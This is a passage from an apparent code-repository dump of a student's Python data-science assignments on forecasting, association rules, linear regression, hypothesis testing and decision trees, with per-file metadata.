predictions.cumsum()\r\nprint(predictions_cumsum.head())\r\n\r\npred_log = pd.Series(month_index_log.iloc[:,0], index = month_index_log.index)\r\npred_log = pred_log.add(predictions_cumsum, fill_value = 0)\r\nprint(pred_log.head())\r\n\r\npred_arima = np.exp(pred_log)\r\n\r\nplt.plot(month_index, color = 'blue')\r\nplt.plot(pred_arima, color = 'red')\r\nplt.title('RMSE: %.4f'% np.sqrt(sum((pred_arima-month_index.iloc[:,0])**2)/len(month_index)))\r\n\r\nresult.plot_predict(1,200)\r\nx = result.forecast(steps = 120)\r\n\r\n" }, { "alpha_fraction": 0.6981317400932312, "alphanum_fraction": 0.7207472920417786, "avg_line_length": 33.71929931640625, "blob_id": "ac80a3c09324e3dde001afe2515b438e954b181c", "content_id": "369e0aaae6d961fdaa0af6214821d0b95872fec0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2034, "license_type": "no_license", "max_line_length": 141, "num_lines": 57, "path": "/Association Rules/my_movies.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Sep 26 20:41:47 2020\r\n\r\n@author: Dhotre\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mlxtend.frequent_patterns import apriori,association_rules\r\n\r\n#importig dataset\r\ndata=pd.read_csv('D:\\\\ML Docs\\\\Excelr\\\\Assignments\\\\Association rules\\\\my_movies.csv')\r\ndata.describe()\r\n\r\n#removing unwanted columns\r\ndata_apr=data.iloc[:,5:]\r\ndata_apr\r\n\r\n#getting frequent itemsets\r\nfrequent_itemsets1 = apriori(data_apr,min_support = 0.05,max_len = 3,use_colnames = True)\r\nfrequent_itemsets=frequent_itemsets1.sort_values('support', ascending = False, inplace = False)\r\n\r\n#barplot of top 10 items with highest support\r\nplt.figure(figsize = (25,10))\r\nplt.bar(x= list(range(0,11)), height = frequent_itemsets.support.iloc[0:11,]);plt.xticks(list(range(0,11)),frequent_itemsets.itemsets[0:11])\r\nplt.xlabel('itemsets');plt.ylabel('support values')\r\n\r\n#getting association rules\r\nrules1 = association_rules(frequent_itemsets, metric = 'lift', min_threshold=1)\r\nrules= rules1.sort_values('lift', ascending = False, inplace = False)\r\n\r\n#removing redundancy\r\ndef slist(i):\r\n return (sorted(list(i)))\r\n\r\nconcat1 = rules.antecedents.apply(slist)+ rules.consequents.apply(slist) \r\nconcat = concat1.apply(sorted) #ascending order\r\n\r\nrule_sets = list(concat) #converting series to list\r\n\r\nuniq_rule_sets = [list(m) for m in set(tuple(i) for i in rule_sets)]\r\n\r\nindex_rules = []\r\nfor i in uniq_rule_sets:\r\n index_rules.append(rule_sets.index(i))\r\n \r\nrules_no_red = rules.iloc[index_rules,:]\r\nfinal_rules = rules_no_red.sort_values('lift',ascending = False , inplace = False)\r\n\r\n#cutomers who watched 'sixth sense' and 'LOTR1' have also watched 'Green Mile'\r\n#person watching ;Green Mile' most probably watched 'LOTR1' and 'Harry Potter'\r\n#persons who watched 'Harry Potter 1' have watched 'LOTR1'\r\n# and many more such rules can be made as per the mentioned in rules_no_red and giving offers or discounts to the audeience as per\r\n#the formed rules will yield the better profits" }, { "alpha_fraction": 0.6438301205635071, "alphanum_fraction": 0.6654647588729858, "avg_line_length": 30, "blob_id": "d0a6c30e35ea01a8716e6a882afe6df13df00239", "content_id": "0a9a976f5f59596f126ed3e9fdc059df321a037f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2496, "license_type": "no_license", "max_line_length": 102, "num_lines": 78, "path": "/Forecasting/plastics.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 4 01:19:41 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pylab as plt\r\nimport statsmodels.formula.api as smf\r\n\r\n#Importing data set\r\ndata=pd.read_csv(\"E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Forecasting\\\\PlasticSales.csv\")\r\n\r\nmonth=['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\r\np=data['Month'][0]\r\ndata['month']=0\r\nfor i in range(60):\r\n p=data['Month'][i]\r\n data['month'][i]=p[0:3]\r\n\r\n#EDA\r\ndata['Sales'].isnull().sum()\r\ndata['Sales'].mean() \r\ndata['Sales'].median()\r\ndata['Sales'].mode()\r\ndata['Sales'].var()\r\ndata['Sales'].std()\r\ndata['Sales'].skew() #slight right skewed\r\ndata['Sales'].kurt() #slight flat curve\r\ndata.describe()\r\n\r\n#getting dummies\r\nmonth_dummies = pd.DataFrame(pd.get_dummies(data['month']))\r\ndata = pd.concat([data,month_dummies],axis = 1)\r\n\r\n#creating new column for timeseries\r\n#creating a new variable 't'\r\ndata['t']=np.arange(1,61)\r\n#Creating a new variable 't_squared'\r\ndata[\"t_squared\"] = data[\"t\"]*data[\"t\"]\r\n#Creating a new variable 'log_Rider'\r\ndata[\"log_Rider\"] = np.log(data[\"Sales\"])\r\n\r\n#Dropping Months column\r\ndata=data.drop('Month',axis=1)\r\n\r\n#Splitting data into train and test data\r\nTrain = data.head(48)\r\nTest = data.tail(12)\r\n\r\n## Additive seasonality ##\r\nadd_sea = smf.ols('Sales~month',data=Train).fit()\r\npred_add_sea = pd.Series(add_sea.predict(Test[['month']]))\r\nrmse_add_sea = np.sqrt(np.mean((np.array(Test['Sales'])-np.array(pred_add_sea))**2))\r\nrmse_add_sea\r\n#235.60\r\n## Additive Seasonality Quadratic ##\r\nadd_sea_Quad = smf.ols('Sales~t+t_squared+month',data=Train).fit()\r\npred_add_sea_quad = pd.Series(add_sea_Quad.predict(Test[['month','t','t_squared']]))\r\nrmse_add_sea_quad = np.sqrt(np.mean((np.array(Test['Sales'])-np.array(pred_add_sea_quad))**2))\r\nrmse_add_sea_quad #218.19\r\n\r\n## Multiplicative Seasonality ##\r\nMul_sea = smf.ols('log_Rider~month',data = Train).fit()\r\npred_Mult_sea = pd.Series(Mul_sea.predict(Test))\r\nrmse_Mult_sea = np.sqrt(np.mean((np.array(Test['Sales'])-np.array(np.exp(pred_Mult_sea)))**2))\r\nrmse_Mult_sea#239.654\r\n\r\n## Multiplicative Additive Seasonality ##\r\nMul_Add_sea = smf.ols('log_Rider~t+month',data = Train).fit()\r\npred_Mult_add_sea = pd.Series(Mul_Add_sea.predict(Test))\r\nrmse_Mult_add_sea = np.sqrt(np.mean((np.array(Test['Sales'])-np.array(np.exp(pred_Mult_add_sea)))**2))\r\nrmse_Mult_add_sea #160.6833\r\n\r\n#'Additive Seasonality Quadratic' model is working best with least rmse value\r\n" }, { "alpha_fraction": 0.6878701448440552, "alphanum_fraction": 0.7170432209968567, "avg_line_length": 28.783782958984375, "blob_id": "cbf225d072200116886da09b1a41460e191947ce", "content_id": "99a3408e335ff6ff14cbfe8c4e6c4a897555ab3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4559, "license_type": "no_license", "max_line_length": 117, "num_lines": 148, "path": "/Multi linear Regession/50startups.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jan 23 16:10:33 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\n#importing required libraries\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n#importing Dataset\r\ndata= pd.read_csv ('E:\\\\Tej\\Assignments\\\\Asgnmnt\\\\Multi linear Regession\\\\50_Startups.csv')\r\n\r\n\r\n#EDA\r\ndata.columns\r\ndata.info()\r\n\r\n#converting object dtype to category for encoding\r\ndata['State']=data['State'].astype('category')\r\n\r\n#replacing 0 with nan\r\nfrom numpy import nan\r\ndata=data.replace(0,nan)\r\n#replacing nan values with column means\r\ndata.fillna(data.mean(),inplace=True)\r\n\r\nimport seaborn as sns\r\nsns.catplot(x='State',y='Profit',kind= 'box' ,data = data) #newyork has outliers\r\nsns.barplot( x='State',y='Profit',data = data)\r\n\r\nsns.distplot(data['RndSpend'],kde=True)\r\nsns.distplot(data['Marketing _Spend'],kde=True)\r\nsns.distplot(data['Administration'],kde=True) #left skewed(negatively)\r\n\r\ndata.skew()\r\ndata.kurt()\r\n\r\nsns.heatmap(data.corr(),annot=True)\r\n\r\n#splitting into x and y\r\nx=data.iloc[:,0:4].values\r\ny=data.iloc[:,-1].values\r\n\r\n#Encoding ctegorical data\r\nfrom sklearn.compose import ColumnTransformer\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nct= ColumnTransformer(transformers=[('encoder',OneHotEncoder(),[3])],remainder='passthrough')\r\n#[('kind of transformation,class of trans(),[column index])] passthrough=dont remove data which does not needs trans.\r\nx=np.array(ct.fit_transform(x)) #transfroming features of matrix Xreturning new columns=no. of categories\r\n #our future ML model will expect the variable to be np array\r\nprint(x)\r\n\r\n#splitting dataset into test train data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test= train_test_split(x,y,test_size=0.3,random_state=0)\r\n#if random_state is mentioned same values in train and test datasets always\r\n\r\n#building and training the model\r\nfrom sklearn.linear_model import LinearRegression\r\nmodel= LinearRegression() #build the model\r\nmodel.fit(x_train,y_train) #train the model\r\nprint(model.score(x_test,y_test)) #0.878\r\n\r\n#predicting the results\r\ny_pred=model.predict(x_test)\r\nnp.set_printoptions(precision=2) #upto 2 decimals\r\nprint(y_pred)\r\nprint(np.concatenate((y_pred.reshape(len(y_pred),1),y_test.reshape(len(y_test),1)),1))\r\n\r\n#prediction for the single value\r\nprint(model.predict([[1,0,0,160000,130000,300000]]))\r\n\r\nprint(model.coef_) \r\nprint(model.intercept_)\r\n\r\n#saving prediction in dataset\r\ndata['pred']=(model.predict(x))\r\n\r\n#RMSE for Predicted data\r\ny_resid=data.pred -data.Profit\r\ny_rmse=np.sqrt(np.mean(y_resid*y_resid))\r\ny_rmse #17950.72\r\n\r\n#predicted vs actual\r\nplt.scatter(data['Profit'],data['pred'])\r\n\r\ndata['pred'].corr(data['Profit']) #0.8938\r\n\r\nfrom sklearn.metrics import r2_score\r\ntest_r2_score=r2_score(y_pred,y_test) \r\nprint(test_r2_score) #0.8612\r\n\r\n\r\n####backward elimination####\r\nx=np.append(arr=np.ones((50,1)).astype(int),values=x,axis=1)\r\nimport statsmodels.regression.linear_model as lm\r\n\r\n#creating feature vector which only contain a set of independent variables\r\nx_vtr=x[:,0:]\r\nx_vtr=np.array(x_vtr,dtype=float)\r\nmodel_be=lm.OLS(endog = y, exog = x_vtr).fit()\r\nmodel_be.summary() #x5 is insignificant pvalue=0.995\r\n\r\nx_vtr=x[:,[0,1,2,3,4,6]]\r\nx_vtr=np.array(x_vtr,dtype=float)\r\nmodel_be=lm.OLS(endog=y,exog=x_vtr).fit()\r\nmodel_be.summary() #x1 is insignificant, pvalue=0.092\r\n\r\nx_vtr=x[:,[0,2,3,4,6]]\r\nx_vtr=np.array(x_vtr,dtype=float)\r\nmodel_be=lm.OLS(endog=y,exog=x_vtr).fit()\r\nmodel_be.summary() #x2 is insignificant pvalue=0.374\r\n\r\nx_vtr=x[:,[0,2,4,6]]\r\nx_vtr=np.array(x_vtr,dtype=float)\r\nmodel_be=lm.OLS(endog=y,exog=x_vtr).fit()\r\nmodel_be.summary(()) #x1 is insignificant\r\n\r\nx_vtr=x[:,[0,4,6]]\r\nx_vtr=np.array(x_vtr,dtype=float)\r\nmodel_be=lm.OLS(endog=y,exog=x_vtr).fit()\r\nmodel_be.summary()\r\n\r\n#therefore only Rndspend and Marketing-spend are significant, therefore we can now build model\r\n#efficiently on these variables\r\ndataset=data[['Profit','RndSpend','Marketing _Spend']]\r\ndataset\r\n\r\nx_be=dataset.iloc[:,1:].values\r\ny_be=dataset.iloc[:,0].values\r\n\r\n#splitting dataset into test and train\r\nfrom sklearn.model_selection import train_test_split\r\nxbe_train,xbe_test,ybe_train,ybe_test=train_test_split(x_be,y_be,test_size=0.2,random_state=0)\r\n\r\n\r\n#training and building the model\r\nfrom sklearn.linear_model import LinearRegression\r\nmodel2=LinearRegression()\r\nmodel2.fit(np.array(xbe_train),ybe_train)\r\nmodel2.score(xbe_train,ybe_train) #0.77\r\nmodel2.score(xbe_test,ybe_test) #0.90\r\nmodel2.score(x_be,y_be) #0.79 \r\n" }, { "alpha_fraction": 0.6807786822319031, "alphanum_fraction": 0.7146097421646118, "avg_line_length": 33.911563873291016, "blob_id": "6f84e97fd17582f76a1b66ce15ce9e432169ec01", "content_id": "776ba8e2d75de58667988154d567cb9dab925fe8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5291, "license_type": "no_license", "max_line_length": 106, "num_lines": 147, "path": "/Hypothesis/hypo testing assignment.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 4 17:04:59 2020\r\n\r\n@author: Tejaswini\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom scipy import stats\r\nimport statsmodels as sm\r\n\r\n\r\ndata=pd.read_csv('E:\\Tej\\Assignments\\Asgnmnt\\Hypothesis\\Cutlets.csv')\r\ndata\r\n#Data are continuous and comparison of two population samples is to be done\r\n####checking the data for normality####\r\n#H0=data are normal and Ha=Data are not normal\r\n\r\nunit_a=stats.shapiro(data['Unit A'])\r\nunit_a_pvalue=unit_a[1]\r\nprint('p value is '+str(unit_a_pvalue))\r\n\r\n#since p-value is > 0.05--> fail to reject null hypothesis \r\n#Data are normal\r\n\r\nunit_b=stats.shapiro(data['Unit B'])\r\nunit_b_pvalue= unit_b[1]\r\nprint('p value is '+str(unit_b_pvalue))\r\n#since p-value is > 0.05--> fail to reject null hypothesis \r\n#Data are normal\r\n\r\n####checking for variance####\r\n#H0= Data have equal variance & Ha=Data have unequal variance\r\nstats.levene(data['Unit A'],data['Unit B'])\r\n#pvalue is >0.05, Fail to reject H0--> Data are having equal variance.\r\nhelp(stats.levene)\r\n#2 sample t_test\r\n#H0= diameter of cutlet in Unit A= diameter of cutlet in Unit B\r\n#Ha= diameter of cutlet in Unit A is not equal to the diameter of cutlet in Unit B\r\nresult=stats.ttest_ind(data['Unit A'],data['Unit B'])\r\nprint('p value is '+str(result[1]))\r\n# since p-value is >0.05,Fail to reject H0\r\n#Thus there is no any significant difference in the diameter of the cutlet between two units. \r\n\r\n\r\n\r\n\r\n\r\n####BuyerRatio#####\r\nsales=pd.read_csv('D:\\ML Docs\\Excelr\\Assignments\\Hypothesis testing\\BuyerRatio.csv',encoding='ISO-8859-1')\r\nsales\r\nsales.columns\r\n\r\nsales1=sales.drop('Observed Values',axis=1)\r\nsales1\r\n\r\nsales1.values\r\nstats.chi2_contingency(sales1)\r\n#x=male,female y=sales\r\n#since both the x and y are discrete in 2+categories, we will go for chi-squared test\r\n# Let H0= all proportiona are equal and Ha=Not all proportions are same.\r\nchi2=stats.chi2_contingency(sales1)\r\nchi2\r\nchi2_pvalue=chi2[1]\r\nprint('p-value is '+str(chi2_pvalue))\r\nhelp(stats.chi2_contingency)\r\n#since, P-value=0.66>0.05-->P high Null fly. therefore, all proportions are equal.\r\n\r\n\r\n\r\n\r\n####Average Turn Around Time####\r\n#H0 = there is difference in the average Turn Around Time (TAT) of reports.\r\n#Ha = there is no difference in the average Turn Around Time (TAT) of reports. \r\ntat=pd.read_csv('F:\\\\Excelr docs\\\\Assignments\\\\Hypothesis testing\\\\LabTAT.csv',encoding='ISO-8859-1')\r\ntat\r\n# here, x=no. of samples, y= Turn Around Time\r\n# more than two samples are involved, therefore we will go for normality test.\r\n#H0=Data are normal, Ha=Data are not Normal\r\nlab1= stats.shapiro(tat['Laboratory 1'])\r\nlab1_pvalue=lab1[1]\r\nprint('p-value is '+str(lab1_pvalue))\r\n# pvalue=0.55,data are normal\r\n\r\nlab2=stats.shapiro(tat['Laboratory 2'])\r\nlab2_pvalue=lab2[1]\r\nprint('p-value is '+str(lab2_pvalue))\r\n#pvalue=0.86, Data are normal\r\n\r\nlab3=stats.shapiro(tat['Laboratory 3'])\r\nlab3_pvalue=lab3[1]\r\nprint('p-value is '+str(lab3_pvalue))\r\n#p-value=0.42, data are normal\r\n\r\nlab4=stats.shapiro(tat['Laboratory 4'])\r\nlab4_pvalue=lab4[1]\r\nprint('p-value is '+str(lab4_pvalue))\r\n#p-value=0.66, data are normal\r\n\r\n#since the data are normal, we will proceed for the variance test\r\n# H0= data have equal variance, Ha=Data do not have equal Variance\r\nvar_lab1=stats.levene(tat['Laboratory 1'],tat['Laboratory 2'])\r\nprint('p value is '+str(var_lab1[1])) # pvalue=0.06 data have equal variance\r\n# \r\nvar_lab2=stats.levene(tat['Laboratory 1'],tat['Laboratory 3'])\r\nprint('p-value is '+str(var_lab2[1])) #pvalue=0.0064 data do not have equal variance\r\n\r\nvar_lab3=stats.levene(tat['Laboratory 1'],tat['Laboratory 4'])\r\nprint('p value is '+str(var_lab3[1])) #pvalue 0.221 data have equal variance\r\n\r\nvar_lab4=stats.levene(tat['Laboratory 2'],tat['Laboratory 3'])\r\nprint('p value is '+str(var_lab4[1])) # pvalue=0.33 data have equal variance\r\n\r\n#one way ANOVA test\r\nimport scipy.stats as stats\r\noutcome = stats.f_oneway(tat['Laboratory 1'],tat['Laboratory 2'],tat['Laboratory 3'],tat['Laboratory 4'])\r\np_value = outcome[1]\r\nprint(p_value)\r\n# pvalue is less than 0.05, therefore, P low null go, accepting alternaate hypothesis that\r\n# there is no difference in the average Turn Around Time (TAT) of reports.\r\n\r\n####Faltoons####\r\ndata= pd.read_csv('D:\\ML Docs\\Excelr\\Assignments\\Hypothesis testing\\Faltoons.csv',encoding='ISO-8859-1')\r\ndata\r\ndata.describe()\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber= LabelEncoder()\r\ndata['Weekdays']=number.fit_transform(data['Weekdays'])\r\ndata['Weekend']=number.fit_transform(data['Weekend'])\r\ndata\r\n#converted Male=0 and Female=0\r\ndata['Weekdays'].value_counts()\r\ndata['Weekend'].value_counts()\r\n\r\ncount= np.array([287,233]) # how many female and went for shopping om weedays and weekend\r\nnos= np.array([400,400]) #how many total number of females went for shopping\r\n\r\n#Ho= Male vs female walking to the store differ based on the days of week\r\n#Ha= Male vs female walking to the store do not differ based on the days of week\r\nfrom statsmodels.stats.proportion import proportions_ztest\r\nstats,pval=proportions_ztest(count,nos)\r\nprint('{0:0.6f}'.format(pval))\r\n#P-value-->0.00006<0.05. P low null go\r\n#therefore accepting Alternative hypothesis\r\n#so, Male vs female walking to the store do not differ based on the days of week\r\n\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6736963391304016, "alphanum_fraction": 0.7009202241897583, "avg_line_length": 24.886598587036133, "blob_id": "ef0e28ce5481616ab01fc9aa6fdf3ac96137c94d", "content_id": "52ab25388ed8dc2fc8d6f892661fc9518429c869", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2608, "license_type": "no_license", "max_line_length": 108, "num_lines": 97, "path": "/Multi linear Regession/Computer_Data.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Dec 21 11:43:38 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n#imporing dataset\r\ndf= pd.read_csv('E:\\Tej\\Assignments\\Asgnmnt\\Multi linear Regession\\Computer_Data.csv',encoding='ISO-8859-1')\r\n\r\n#EDA\r\ndf.head()\r\ndf.columns\r\ndf.info()\r\n\r\ndf1=df[['price', 'speed', 'hd']]\r\nsns.barplot(x='ram',y='price',data=df)\r\nsns.barplot(x='cd',y='price',data=df)\r\nsns.barplot(x='ads',y='price',data=df)\r\nplt.scatter('hd','speed',data=df)\r\n\r\ndf.skew()\r\ndf.kurt()\r\n\r\nsns.heatmap(df1.corr(),annot=True)\r\nsns.distplot(df['price'],kde=True) #positively skewed\r\nsns.distplot(df['hd'],kde=True) #not normal \r\n\r\nsns.catplot(x='screen',y='price',data=df,kind='box')\r\nsns.catplot(x='screen',y='price',data=df,kind='box')\r\n\r\nplt.plot(df.price,df.ram,'ro')\r\ndf.ram.value_counts().plot(kind='pie')\r\n\r\ndf.price.groupby(df.screen).plot(kind='hist')\r\n\r\n#ENcoding categorical data\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber= LabelEncoder()\r\ndf['cd']= number.fit_transform(df['cd'])\r\ndf['multi']= number.fit_transform(df['multi'])\r\ndf['premium']= number.fit_transform(df['premium'])\r\ndf.dtypes\r\n\r\n#separating x and y variables\r\nx= df.iloc[:,1:].values\r\ny=df.iloc[:,0].values\r\n\r\nsns.pairplot(df)\r\n\r\n\r\n#splitting data into train and test data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.3,random_state=0)\r\n\r\n#creating linear model\r\nfrom sklearn.linear_model import LinearRegression\r\nmodel=LinearRegression() #model Building\r\nmodel.fit(x_train,y_train) #model trainig\r\n\r\n#predicting the results\r\ny_pred= model.predict(x_test)\r\nnp.set_printoptions(precision=2)\r\nprint(np.concatenate((y_pred.reshape(len(y_pred),1),y_test.reshape(len(y_test),1)),1))\r\n\r\n#scatterplot of predicted vs actual values \r\nplt.scatter(y_pred,y_test)\r\n\r\n#saving the results in dstaframe\r\ndf['pred']=model.predict(x)\r\n\r\n#correlation between actual and predicted values\r\ndf['price'].corr(df['pred']) #0.8806 \r\n\r\n#RMSE value for test data\r\ntest_rmse =np.sqrt(np.mean(y_test*y_pred))#2260.56\r\n\r\n#R^2 value\r\nfrom sklearn.metrics import r2_score\r\ntest_r2_Score= r2_score(y_test,y_pred) #0.8612\r\n\r\nprint(test_rmse) #2260.56\r\nprint(test_r2_Score)#0.7743\r\n\r\n\r\n#Backward elimintion#\r\nx=np.append(arr=np.ones((6259,1)).astype(int),values=x,axis=1)\r\nimport statsmodels.regression.linear_model as lm\r\nx_opt=x[:,0:]\r\nmodel_be=lm.OLS(endog=y,exog=x_opt).fit()\r\nmodel_be.summary() #since, every variable is having pvalue<0.05,we'll consider the model as final model.\r\n" }, { "alpha_fraction": 0.8222222328186035, "alphanum_fraction": 0.8222222328186035, "avg_line_length": 21, "blob_id": "0877082a793c73b07f7b23b8fb8737985c7a2ba8", "content_id": "bfd71eaba0f34f87931329c23674e25794b16d29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 45, "license_type": "no_license", "max_line_length": 26, "num_lines": 2, "path": "/README.md", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# Data-Science-Assignments\nAssignments done \n" }, { "alpha_fraction": 0.6719191670417786, "alphanum_fraction": 0.6941413879394531, "avg_line_length": 23.71875, "blob_id": "11763fdab8897eae96c615720214bc6157b9b8a9", "content_id": "1652915d77f03d75cd5efbf35ccef34f59631c40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2475, "license_type": "no_license", "max_line_length": 128, "num_lines": 96, "path": "/Multi linear Regession/corolla.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 10 20:10:51 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.style as style\r\n\r\nstyle.use('tableau-colorblind10')\r\n\r\n#importing dataset\r\ncorolla= pd.read_csv('E:\\\\Tej\\Assignments\\\\Asgnmnt\\\\Multi linear Regession\\\\ToyotaCorolla.csv',encoding='latin1')\r\ncorolla\r\n\r\n#EDA\r\ncorolla.columns\r\ncorolla.head()\r\ndf=corolla[[\"Price\",\"Age_08_04\",\"KM\",\"HP\",\"cc\",\"Doors\",\"Gears\",\"Quarterly_Tax\",\"Weight\"]] #selecting given columns for operation\r\n\r\ndf.head() #top 5 obserations\r\ndf.info() #laast 5 operations\r\ndf.dropna() #drop na values #df.fillna(0) to fill na values with zero\r\ndf.describe()\r\n\r\nimport seaborn as sns\r\nsns.barplot(x='Doors',y='Price',data=df)\r\nsns.barplot(x='Gears',y='Price',data=df)\r\n\r\ndf['Gears'].value_counts().plot(kind='pie')\r\ndf['Doors'].value_counts().plot(kind='pie')\r\n\r\nsns.distplot(df['Price'],kde=True)\r\nsns.distplot(df['KM'],kde=True)\r\n\r\nplt.scatter(df.Price,df.KM)\r\ndf.Price.corr(df.KM) #price decreases with km\r\n\r\nsns.catplot(x='Doors',y='Price',data=df,kind='box')\r\nsns.heatmap(df.corr(),annot=True)\r\n\r\n#filling 1 values in KM column with nan and replacing with mean of the column\r\nfrom numpy import nan\r\ndf.loc[df['KM']]=df['KM'].replace(1,nan)\r\ndf.fillna(df.mean(),inplace=True)\r\ndf.isna().sum() #0\r\n\r\nimport seaborn as sns\r\nsns.pairplot(df)\r\n\r\n\r\n#splitting data into x and y\r\ny=df.iloc[:,0]\r\nx=df.iloc[:,1:]\r\n\r\n\r\n#train test split\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_test, y_train, y_test=train_test_split(x,y,test_size=0.3,random_state=0)\r\n\r\n\r\n#since this is produced as a series object we've to convert it to np to produce results\r\ny=y.to_numpy()\r\ny_test=y_test.to_numpy()\r\n\r\n\r\n#building model\r\nfrom sklearn.linear_model import LinearRegression\r\nmodel=LinearRegression() #build the model\r\nmodel.fit(x_train,y_train) #train the model\r\nprint(model.score(x_test,y_test)) #0.6555--> poor model\r\n\r\n#predicting the results\r\ny_pred= model.predict(x_test)\r\nnp.set_printoptions(precision=2)\r\nprint(np.concatenate((y_pred.reshape(len(y_pred),1),y_test.reshape(len(y_test),1)),1))\r\n\r\nplt.scatter(y_pred,y_test)\r\n\r\n#saving results in the dataset\r\ndf['pred']=(model.predict(x))\r\n\r\ny_resid= y_pred-y_test\r\n\r\n#standardized residuals\r\ny_rmse= np.sqrt(np.mean(y_pred*y_test))\r\n\r\nfrom sklearn.metrics import r2_score\r\ntest_r2s=r2_score(y_test,y_pred)\r\n\r\nprint(y_rmse) #10895.54\r\nprint(test_r2s) #0.655\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6585437655448914, "alphanum_fraction": 0.6823253035545349, "avg_line_length": 29.5, "blob_id": "ca664cf4098415b3a3e80b22bc83ded8378fd128", "content_id": "cb21bda1e0d988f1c3779aedcafa5df1042287d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3406, "license_type": "no_license", "max_line_length": 122, "num_lines": 108, "path": "/Decision Tree/Company data Decision Tree.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 29 19:25:47 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_csv('E:\\Tej\\Assignments\\Asgnmnt\\Decision Tree\\Company_Data.csv')\r\ndata\r\ndata.describe()\r\ndata.info() #no null values\r\ndata.columns\r\n\r\ndata_cat = ['ShelveLoc','Urban', 'US']\r\n\r\n#Encoding categorical data\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber = LabelEncoder()\r\nfor i in data_cat:\r\n data[i] = number.fit_transform(data[i])\r\n \r\nlabel_enc = LabelEncoder()\r\ndata['sales'] = label_enc.fit_transform(pd.cut(data['Sales'],bins = 2, retbins = True )[0]) #converting data into two bins\r\ndata = data.drop('Sales',axis = 1) #dropping the existing Sales column\r\n\r\n#EDA\r\nimport seaborn as sns\r\nsns.countplot(x= 'ShelveLoc',data =data)\r\nsns.countplot(x= 'Urban',data =data)\r\nsns.countplot(x= 'US',data =data)\r\n\r\nsns.barplot(data.sales,data.Price)\r\nsns.barplot(data.sales,data.Income)\r\nsns.barplot(data.Urban,data.Income)\r\n\r\nsns.boxplot(x='CompPrice',data = data)\r\nsns.boxplot(x ='Population',data = data) #no outlier\r\nsns.boxplot(x='Price',data = data) \r\nsns.boxplot(x='Age',data =data) #no outlier\r\nsns.boxplot(x= 'Education',data = data) #no outlier\r\nsns.boxplot(x= 'Income',data = data) #no outlier\r\nhelp(sns.boxplot) \r\n\r\nsns.boxplot(x = 'sales', y = 'CompPrice', data = data)\r\nsns.boxplot(x = 'sales', y = 'Population', data = data)\r\nsns.boxplot(x = 'sales', y = 'Price', data = data)\r\nsns.boxplot(x = 'sales', y = 'Income', data = data)\r\n\r\ndata.sales.value_counts() #0=241,1=159\r\n#imbalance in the sales variable will cause bias in the model. so, now we will go for resampling\r\n\r\nmajority_class = data[data.sales == 0] \r\nminority_class = data[data.sales == 1]\r\n\r\nfrom sklearn.utils import resample\r\nminority_class_unsampled = resample(minority_class,\r\n replace = True, #sample with replacement\r\n n_samples = 241, #samples matching majority class\r\n random_state = 123) #reproducing results\r\n\r\ndata_sampled = pd.concat([majority_class,minority_class_unsampled])\r\n#determining x and y data\r\nX= data_sampled.iloc[:,0:10]\r\nY= 